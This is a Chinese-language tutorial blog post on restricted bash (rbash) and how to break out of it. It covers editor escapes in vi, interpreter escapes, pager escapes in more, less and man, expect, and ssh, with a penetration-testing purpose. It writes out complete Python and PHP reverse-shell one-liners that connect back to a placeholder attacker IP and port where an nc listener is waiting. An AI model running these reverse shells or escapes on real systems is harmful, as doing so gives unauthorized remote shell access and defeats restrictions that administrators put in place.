专栏首页E条咸鱼RBash - 受限的Bash绕过

RBash - 受限的Bash绕过

man bash的时候,里面会有介绍到关于rbash是个什么东西

翻译解释一下就是

如果bash以rbash这个名字启动,或者是通过-r选项调用时,那么这个shell就会受限 受限shell(以下统称为rbash)和bash相同,但以下情况是不允许rbash执行的

  1. 使用命令cd更改目录
  2. 设置或者取消环境变量的设置(SHELL, PATH, ENV, or BASH_ENV)
  3. 指定包含参数'/'的文件名
  4. 指定包含参数' - '的文件名
  5. 使用重定向输出'>', '>>', '> |', '<>' '>&','&>'

大致的限制如上

那么我们如果在实际环境中,如果想要对环境进行进一步的操作,那么rbash肯定是不符合要求的,所以才有了“绕过”这一行为

而因为rbash的特殊性问题,绕过的方法,大多都是通过Linux机器上现有的软件,来执行一个没有限制的shell回来使用

创建限制shell的用户

在RHEL和Centos的系统中,rbash不能直接实现,所以在开始之前,我们需要通过 ln-s来建立一个软连接

然后创建用户的时候,在设置用户是以/bin/rbash来启动的shell

试试水,发现用户 elapse不能切换目录了,至于为什么这样能生效,在上面解释了rbash和bash是同个东西,只不过不同命名启动时,效果不一样

RBash 绕过

hacking articles中,有解释过类似的行为

他将绕过rbash的操作分为了6个部分

第一个是使用Linux现有的软件,例如vi或者ed这类编辑器,来执行一个shell

第二个是使用一种语言来执行命令,返回一个无限制的shell,例如使用 python的os库执行 /bin/bash

第三个是使用系统命令或者php之类的,反弹一个系统shell到你的攻击机上

第四个是利用系统中的二进制文件来进行绕过,这里给出的文件有 more less man

第五个是,利用expect来绕过

第六个是,通过ssh来绕过rbash的限制

编辑器绕过rbash

  • vi编辑器

在命令行中,输入 vi,在末行模式中,输入 :setshell=/bin/bash

这里就直接将shell设置为/bin/bash

接着在执行命令 shell就好了

然后就有一个无限制的shell了

  • ed编辑器

使用编程语言绕过rbash

  • python
  • perl

反弹shell来绕过rbash

  • python反弹

首先在攻击机中 nc-lvp开启监听端口,然后靶机中输入

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

靶机

攻击机

  • php反弹
php -r '$sock=fsockopen("LISTENING IP",LISTENING PORT);exec("/bin/sh -i <&3 >&3 2>&3");'

利用二进制文件

  • more
直接 ! 'sh'
  • less

然后末行模式输入 !'sh'

  • man

和上面一样

Expect 绕过rbash

expect是免费的编程工具,用来实现自动的交互式任务,在实际环境中脚本或者命令都需要从终端输入来继续运行,而expect就可以根据程序的提示来模拟输入个程序

ssh绕过rbash

好像不止有这种写法,但是版本问题只能用这个

还有 -t"/binbash"

参考链接

https://www.howtoing.com/rbash-a-restricted-bash-shell-explained-with-practical-examples/

https://www.hackingarticles.in/multiple-methods-to-bypass-restricted-shell/

本文分享自微信公众号 - E条咸鱼(gh_04d31a502ded),作者:现在你看到我的ID了

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2020-01-05

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • CVE-2017-7529 Nginx整数溢出漏洞分析2

    正常情况下,如果我们 传入一串完整的range,那么他会检查 start,保证不会溢出为负值

    Elapse
  • 一条payload发生的事情(来自对报错注入的思考)

    最近在重新整理复现MYSQL注入天书,遇到了一条很有意思的报错注入的payload:

    Elapse
  • ret指令与call指令的深入理解

    其中ret指令用栈中的数据,修改IP的内容,实现近转移。而call指令将IP或者CS和IP压入栈中,实现转移。还有retf指令,用栈中的数据,修改CS和IP的内...

    Elapse
  • POSTGRESQL AUTO_VACUUM 弄清问题,解决问题

    弄清楚POSTGRESQL 的VACUUM 对于维护好POSTGRESQL 和 理解一些在基于POSTGRESQL 设计中的"点" 是有必要性的. 虽然数据库是...

    AustinDatabases
  • POSTGRESQL AUTO_VACUUM 弄清问题,解决问题

    ​弄清楚POSTGRESQL 的VACUUM 对于维护好POSTGRESQL 和 理解一些在基于POSTGRESQL 设计中的"点" 是有必要性的. 虽然数据库...

    AustinDatabases
  • 安卓日常开发和逆向中常用的shell命令与非shell命令

    小小咸鱼YwY
  • 简单实用靠谱的安卓专项测试工具

    对于fps的获取,Android 6.0以下系统需要进入系统设置-GPU呈现模式分析,选中在adb shell dumpsys gfxinfo 中

    厦门-安仔
  • EdgeDRNN:用于边缘推理的递归神经网络加速器(computer science)

    低延迟,低功耗的便携式递归神经网络(RNN)加速器为IoT,机器人技术和人机交互等实时应用提供了强大的推理功能。我们提出了一种基于轻量级门控循环单元(GRU)的...

    用户8054058
  • 突发!中国法院初步裁决禁售多款iPhone,高通告赢了苹果?

    今日晚间消息,高通公司在中国赢得了对苹果公司的诉讼,福州中院已经做出初步裁决:在中国禁售部分iPhone型号。

    新智元
  • 突发!中国法院初步裁决禁售多款iPhone,高通告赢了苹果?

    今日晚间消息,高通公司在中国赢得了对苹果公司的诉讼,福州中院已经做出初步裁决:在中国禁售部分iPhone型号。

    昱良

扫码关注云+社区

领取腾讯云代金券